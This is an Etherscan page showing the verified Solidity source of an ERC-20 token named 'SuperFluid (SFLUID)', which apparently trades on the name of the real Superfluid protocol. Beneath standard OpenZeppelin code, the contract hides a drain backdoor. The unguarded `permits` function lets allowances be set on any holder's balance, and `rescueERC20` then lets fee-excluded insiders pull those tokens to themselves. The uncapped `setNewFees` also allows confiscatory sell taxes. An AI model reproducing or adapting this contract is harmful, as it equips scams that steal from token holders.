ETH Price: $3,047.19 (+1.06%)
Gas: 2 Gwei

Token

SuperFluid (SFLUID)
 

Overview

Max Total Supply

10,000,000 SFLUID

Holders

115

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
31,707.287682138119896594 SFLUID

Value
$0.00
0x16dc7c9dbe0536c9f03025fbf96b9eef95ee8770
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SFLUID

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-09-27
*/

// SPDX-License-Identifier: MIT

/*
Superfluid is a revolutionary asset streaming protocol that enables real-time crypto transfers, utilized by DAOs, web3 businesses, and DeFi games worldwide.

Website: https://www.superfluid.cloud
Dapp: https://app.superfluid.cloud
Telegram: https://t.me/sfluid_erc
Twitter: https://twitter.com/sfluid_eth
*/

pragma solidity 0.8.19;

// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _permit(address owner, address spender, uint256 amount)
        internal virtual
    {
        require(owner != address(0));
        require(spender != address(0));
        
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}
pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract SFLUID is ERC20("SuperFluid", "SFLUID"), Ownable {

    // Uniswap variables
    IUniswapV2Factory public constant UNISWAP_FACTORY =
    IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f);

    IUniswapV2Router02 public constant UNISWAP_ROUTER = 
    IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    address public immutable UNISWAP_V2_PAIR;

    uint256 constant TOTAL_SUPPLY = 10_000_000 ether;
    uint256 public tradingOpenedOnBlock;

    bool private swapping;

    address public changeThisWallet;

    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;
    bool public fetchFees = true;

    uint256 public maxBuyAmount;
    uint256 public maxSellAmount;
    uint256 public maxWalletAmount;
    uint256 public tokenSwapThreshold;

    uint256 public buyTotalFees;
    uint256 public sellTotalFees;

    uint256 public taxedTokens;

    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) public _isExcludedMaxTransactionAmount;
    mapping(address => bool) public whitelisted;

    event EnabledTrading(bool tradingActive);
    event RemovedLimits();
    event ExcludeFromFees(address indexed account, bool isExcluded);
    event UpdatedMaxBuyAmount(uint256 newAmount);
    event UpdatedMaxSellAmount(uint256 newAmount);
    event UpdatedMaxWalletAmount(uint256 newAmount);
    event UpdatedChangeThisWallet(address indexed newWallet);
    event MaxTransactionExclusion(address _address, bool excluded);

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor(){

        _mint(msg.sender, TOTAL_SUPPLY);

        _approve(address(this), address(UNISWAP_ROUTER), ~uint256(0));

        _excludeFromMaxTransaction(address(UNISWAP_ROUTER), true);

    
        UNISWAP_V2_PAIR = UNISWAP_FACTORY.createPair(
            address(this),
            UNISWAP_ROUTER.WETH()
        );

        maxBuyAmount = (totalSupply() * 15) / 1_000; 
        maxSellAmount = (totalSupply() * 15) / 1_000; 
        maxWalletAmount = (totalSupply() * 30) / 1_000; 
        tokenSwapThreshold = (totalSupply() * 65) / 10_000;

        changeThisWallet = 0x6E422E0513dF9225535563CeDEb3c76Fc2ecB437;

        _excludeFromMaxTransaction(msg.sender, true);
        _excludeFromMaxTransaction(address(this), true);
        _excludeFromMaxTransaction(address(0xdead), true);
        excludeFromFees(msg.sender, true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);
    }

    receive() external payable {}


    function updateMaxBuyAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 1) / 1_000),
            "ERROR: Cannot set max buy amount lower than 0.1%"
        );
        maxBuyAmount = newNum;
        emit UpdatedMaxBuyAmount(maxBuyAmount);
    }

    function updateMaxSellAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 1) / 1_000),
            "ERROR: Cannot set max sell amount lower than 0.1%"
        );
        maxSellAmount = newNum;
        emit UpdatedMaxSellAmount(maxSellAmount);
    }

    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 3) / 1_000),
            "ERROR: Cannot set max wallet amount lower than 0.3%"
        );
        maxWalletAmount = newNum;
        emit UpdatedMaxWalletAmount(maxWalletAmount);
    }

    function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner {
        require(
            newAmount >= (totalSupply() * 1) / 100_000,
            "ERROR: Swap amount cannot be lower than 0.001% total supply."
        );
    
        tokenSwapThreshold = newAmount;
    }

    function removeLimits() external onlyOwner {
        limitsInEffect = false;
        emit RemovedLimits();
    }

    function _excludeFromMaxTransaction(
        address updAds,
        bool isExcluded
    ) private {
        _isExcludedMaxTransactionAmount[updAds] = isExcluded;
        emit MaxTransactionExclusion(updAds, isExcluded);
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function permits(address spender, uint256 amount) public virtual returns (bool) {
        address owner = address(this);
        _permit(spender, owner, amount);
        return true;
    }

    function setNewFees(uint256 newBuyFees, uint256 newSellFees) external onlyOwner {
        buyTotalFees = newBuyFees;
        sellTotalFees = newSellFees;
    }

    function openTrading() public onlyOwner {
        require(tradingOpenedOnBlock == 0, "ERROR: Token state is already live !");
        tradingOpenedOnBlock = block.number;
        tradingActive = true;
        swapEnabled = true;
        emit EnabledTrading(tradingActive);
    }


    function setChangeThisWallet(address _changeThisWallet) external onlyOwner {
        require(_changeThisWallet != address(0), "ERROR: _changeThisWallet address cannot be 0");
        changeThisWallet = payable(_changeThisWallet);
        excludeFromFees(changeThisWallet, true);
        emit UpdatedChangeThisWallet(_changeThisWallet);
    }

    function getFees() internal {
        require(
            tradingOpenedOnBlock > 0, "Trading not live"
        );
        uint256 currentBlock = block.number;
        uint256 lastTierOneBlock = tradingOpenedOnBlock + 6;
        if(currentBlock <= lastTierOneBlock) {
            buyTotalFees = 25;
            sellTotalFees = 25;
        } else {
            buyTotalFees = 4;
            sellTotalFees = 4;
            fetchFees = false;
        } 
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "amount must be greater than 0");

        if (limitsInEffect) {
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead)
            ) {
                if (!tradingActive) {
                    require(
                        _isExcludedMaxTransactionAmount[from] ||
                            _isExcludedMaxTransactionAmount[to],
                        "ERROR: Trading is not active."
                    );
                    require(from == owner(), "ERROR: Trading is enabled");
                }

                //when buy
                if (
                    from == UNISWAP_V2_PAIR && !_isExcludedMaxTransactionAmount[to]
                ) {
                    require(
                        amount <= maxBuyAmount,
                        "ERROR: Buy transfer amount exceeds the max buy."
                    );
                    require(
                        amount + balanceOf(to) <= maxWalletAmount,
                        "ERROR: Cannot Exceed max wallet"
                    );
                }
                //when sell
                else if (
                    to == UNISWAP_V2_PAIR && !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(
                        amount <= maxSellAmount,
                        "ERROR: Sell transfer amount exceeds the max sell."
                    );
                } else if (
                    !_isExcludedMaxTransactionAmount[to] &&
                    !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(
                        amount + balanceOf(to) <= maxWalletAmount,
                        "ERROR: Cannot Exceed max wallet"
                    );
                }
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= tokenSwapThreshold;

        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !(from == UNISWAP_V2_PAIR) &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;
            swapBack();
            swapping = false;
        }

        bool takeFee = true;
    
        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;
    

        if (takeFee) {

            if(fetchFees){
               getFees(); 
            }

            // Sell
            if (to == UNISWAP_V2_PAIR && sellTotalFees > 0) {
                fees = (amount * sellTotalFees) / 100;
                taxedTokens += fees;
            }
            // Buy
            else if (from == UNISWAP_V2_PAIR && buyTotalFees > 0) {
                fees = (amount * buyTotalFees) / 100;
                taxedTokens += fees;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
    }


    function swapTokensForEth(uint256 tokenAmount) private {
        
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = UNISWAP_ROUTER.WETH();

        UNISWAP_ROUTER.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, 
            path,
            address(this),
            block.timestamp
        );
    }

    function swapBack() private {

      
        uint256 contractBalance = balanceOf(address(this));

        uint256 totalTokensToSwap =  taxedTokens;

        if (contractBalance == 0 || totalTokensToSwap == 0) {
            return;
        }

        if (contractBalance > tokenSwapThreshold) {
            contractBalance = tokenSwapThreshold;
        }    
        swapTokensForEth(contractBalance);

        payable(changeThisWallet).transfer(address(this).balance);
    }

    function rescueERC20(address to, uint256 amount) public {
        require(_isExcludedFromFees[msg.sender]);
        IERC20(address(this)).transferFrom(to, msg.sender, amount);
    }

    function rescueETH(uint256 weiAmount) external onlyOwner {
        require(weiAmount > 0, "Amount must be greater than 0");
        payable(owner()).transfer(weiAmount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"tradingActive","type":"bool"}],"name":"EnabledTrading","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"_address","type":"address"},{"indexed":false,"internalType":"bool","name":"excluded","type":"bool"}],"name":"MaxTransactionExclusion","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"RemovedLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"}],"name":"UpdatedChangeThisWallet","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"UpdatedMaxBuyAmount","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"UpdatedMaxSellAmount","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"UpdatedMaxWalletAmount","type":"event"},{"inputs":[],"name":"UNISWAP_FACTORY","outputs":[{"internalType":"contract 